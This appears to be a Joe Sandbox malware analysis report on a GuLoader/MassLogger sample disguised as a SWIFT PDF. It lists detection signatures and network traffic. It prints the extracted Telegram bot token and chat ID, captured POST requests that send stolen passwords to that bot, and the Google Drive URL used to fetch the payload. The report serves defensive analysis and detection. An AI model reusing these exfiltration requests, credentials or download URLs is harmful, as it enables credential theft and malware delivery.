Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SWIFT091816-24_pdf.exe

Overview

General Information

Sample name:SWIFT091816-24_pdf.exe
Analysis ID:1575732
MD5:397346c3391583257950cfe556f0a5e6
SHA1:10db5f36ad73ec9757cc05e04aef346a5e486fd5
SHA256:342df796e039d1c4b24525eabc4a9e98ce5ff399a4d9ca92dc10b2b87a84c120
Tags:exeGuLoaderuser-julianmckein
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • SWIFT091816-24_pdf.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe" MD5: 397346C3391583257950CFE556F0A5E6)
    • SWIFT091816-24_pdf.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\SWIFT091816-24_pdf.exe" MD5: 397346C3391583257950CFE556F0A5E6)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2465323286.0000000002B76000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.2936005396.0000000001816000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:05:51.900356+010020577441Malware Command and Control Activity Detected192.168.2.449852149.154.167.220443TCP
            2024-12-16T09:05:55.509609+010020577441Malware Command and Control Activity Detected192.168.2.449861149.154.167.220443TCP
            2024-12-16T09:05:59.009494+010020577441Malware Command and Control Activity Detected192.168.2.449872149.154.167.220443TCP
            2024-12-16T09:06:02.572563+010020577441Malware Command and Control Activity Detected192.168.2.449883149.154.167.220443TCP
            2024-12-16T09:06:06.332693+010020577441Malware Command and Control Activity Detected192.168.2.449891149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:05:41.724171+010028032742Potentially Bad Traffic192.168.2.449826193.122.6.16880TCP
            2024-12-16T09:05:49.708588+010028032742Potentially Bad Traffic192.168.2.449826193.122.6.16880TCP
            2024-12-16T09:05:53.508834+010028032742Potentially Bad Traffic192.168.2.449858193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:05:33.778781+010028032702Potentially Bad Traffic192.168.2.449804172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: SWIFT091816-24_pdf.exe.7844.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: SWIFT091816-24_pdf.exeReversingLabs: Detection: 26%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841D1EC CryptUnprotectData,4_2_3841D1EC
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_3841D9D9 CryptUnprotectData,4_2_3841D9D9
            Source: SWIFT091816-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49832 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:49804 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:49812 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49852 version: TLS 1.2
            Source: SWIFT091816-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38410671h4_2_384103AF
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38411042h4_2_38410C28
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841C985h4_2_3841C638
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841F2F8h4_2_3841F05A
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841B339h4_2_3841B07F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841BBE9h4_2_3841B930
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841C499h4_2_3841C1F2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841DD40h4_2_3841DA89
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841E5F0h4_2_3841E339
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841EEA0h4_2_3841EBF2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38411042h4_2_38410C1A
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841B791h4_2_3841B4D8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841C041h4_2_3841BDA2
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841E198h4_2_3841DEE1
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38411042h4_2_38410F6F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 3841EA48h4_2_3841E790
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB2C60h4_2_38FB29B8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then push 00000000h4_2_38FBBDF0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB882Dh4_2_38FB8650
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB91B7h4_2_38FB8650
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB7318h4_2_38FB7070
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB1B00h4_2_38FB1858
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB4ACAh4_2_38FB4820
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38FB8193
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then push 00000000h4_2_38FBC92F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB23B0h4_2_38FB2108
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB5D60h4_2_38FB5AB8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB3510h4_2_38FB3268
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB54B0h4_2_38FB5208
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_38FBCBE7
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB4670h4_2_38FB43C8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38FB8373
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB6610h4_2_38FB6368
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_38FB7B4F
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB3DC0h4_2_38FB3B18
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB7770h4_2_38FB74C8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB1F58h4_2_38FB1CB0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB6EC0h4_2_38FB6C18
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB16A8h4_2_38FB1400
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB5058h4_2_38FB4DB0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB2808h4_2_38FB2560
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB3968h4_2_38FB36C0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB5908h4_2_38FB5660
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB30B8h4_2_38FB2E10
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB6A68h4_2_38FB67C0
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB1250h4_2_38FB0FA8
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB4218h4_2_38FB3F70
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then jmp 38FB61B8h4_2_38FB5F10
            Source: C:\Users\user\Desktop\SWIFT091816-24_pdf.exeCode function: 4x nop then push 00000000h4_2_394EE7C8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49852 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49883 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49872 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49891 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49861 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d7e8af6a03cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1da853a7b98dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dcf16c14216Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1dfb205ad284Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1e200f538461Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49826 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49858 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49804 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49832 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d7e8af6a03cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036255000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000361F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: SWIFT091816-24_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003628A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000361F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.000000003631A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.00000000363F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/6
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/v
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2664991064.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2630610173.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2611982710.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2664991064.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2612028287.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B51000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2630610173.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=10KRNq80LmuGO2cUy9zDj3VUe6lGAr_tT&export=download
            Source: SWIFT091816-24_pdf.exe, 00000004.00000003.2664991064.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000003.2630610173.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, SWIFT091816-24_pdf.exe, 00000004.00000002.2940567004.0000000005B79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/h
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: SWIFT091816-24_pdf.exe, 00000004.00000002.2961833373.0000000036270000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.orgf
